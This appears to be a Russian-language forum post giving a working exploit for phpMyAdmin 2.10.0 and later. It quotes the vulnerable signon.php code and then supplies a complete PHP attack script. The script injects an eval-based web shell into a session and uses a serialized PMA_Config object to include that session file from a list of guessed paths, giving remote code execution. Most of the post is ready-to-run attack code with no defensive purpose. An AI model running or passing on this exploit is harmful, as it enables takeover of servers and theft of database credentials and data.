Тайну раскрыли 
My version:
Решил пару случаев с версиями 2.10.0 и выше при allow_url_fopen Off. Можно инжектить пхпкод в сессию, т.к. c этими версиями идёт скрипт
/scripts/signon.php
Цитата:
auth_type signon is a feature to allow phpMyAdmin to integrate with Single Sign-on (SSO) systems. Administrators can configure their phpMyAdmin installations to get a MySQL username and password from an existing SSO session, allowing the user sign in once to a control panel, for example, and then switching between applications such as phpMyAdmin without the need to log in again.
|
PHP код:
/* Was data posted? */
if (isset($_POST['user'])) {
/* Need to have cookie visible from parent directory */
session_set_cookie_params(0, '/', '', 0);
/* Create signon session */
$session_name = 'SignonSession';
session_name($session_name);
session_start();
/* Store there credentials */
$_SESSION['PMA_single_signon_user'] = $_POST['user'];
$_SESSION['PMA_single_signon_password'] = $_POST['password'];
$_SESSION['PMA_single_signon_host'] = $_POST['host'];
Exploit
PHP код:
<?php
set_time_limit(0);
function getData($url,$post,$nocook = '')
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_TIMEOUT, 600);
if(empty($nocook)){
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cook.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cook.txt');
}
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 0);
$res = curl_exec($ch);
return $res;
}
$url = $_POST['url'];
$shell = '<?php @eval(stripslashes($_REQUEST[c])); @die($_REQUEST[m]); ?>';
$die_text = 'Injected';
$sess_path = array( '/tmp/',
'/var/tmp/',
'/var/lib/php/',
'/var/lib/php4/',
'/var/lib/php5/',
'/var/lib/php/session/',
'/var/lib/php4/session/',
'/var/lib/php5/session/',
'/shared/sessions',
'/var/php_sessions/',
'/var/sessions/',
'/tmp/php_sessions/',
'/tmp/sessions/',
'../../../tmp/',
'../../../../tmp/',
'../../../../../tmp/',
'../../../../../../tmp/',
'../../../../../../../tmp/',
'../../../temp/',
'../../../../temp/',
'../../../../../temp/',
'../../../../../../temp/',
'../../../../../../../temp/',
'../../../sessions/',
'../../../../sessions/',
'../../../../../sessions/',
'../../../../../../sessions/',
'../../../../../../../sessions/',
'../../../phptmp/',
'../../../../phptmp/',
'../../../../../phptmp/',
'../../../../../../phptmp/',
'../../../../../../../phptmp/');
echo '<form action="" method="POST">
URL:
<br>
<input name="url" value="'.($_POST['url'] ? $_POST['url'] : 'http://localhost/pma/scripts/setup.php').'" size=50><br><br>
Post:
<br>
<input name="post" value="'.($_POST['post'] ? $_POST['post'] : 'phpinfo();').'" size=50><br><br>
<input type="submit" value="Go">
</form>';
if(!empty($url)){
$signon_url = str_replace('setup.php','signon.php',$url);
$signon_page = getData($signon_url,'user='.$shell,'1');
preg_match('/SignonSession=(.*); path=\//U',$signon_page,$signon_array);
$signon = $signon_array[1];
if(empty($signon)){
die('SignonSession not found');
}
$token_page = getData($url,'');
preg_match('/name="token" value="([a-f0-9]{32})"/is',$token_page,$token_array);
$token = $token_array[1];
if(empty($token)){
die('Token not found');
}
foreach($sess_path as $s){
$res = getData($url,'m='.$die_text.'&c='.$_POST['post'].'&action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.'a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($s.'sess_'.$signon).':"'.$s.'sess_'.$signon.'";}}');
if(eregi($die_text,$res)){
die($res);
}
}
}
?>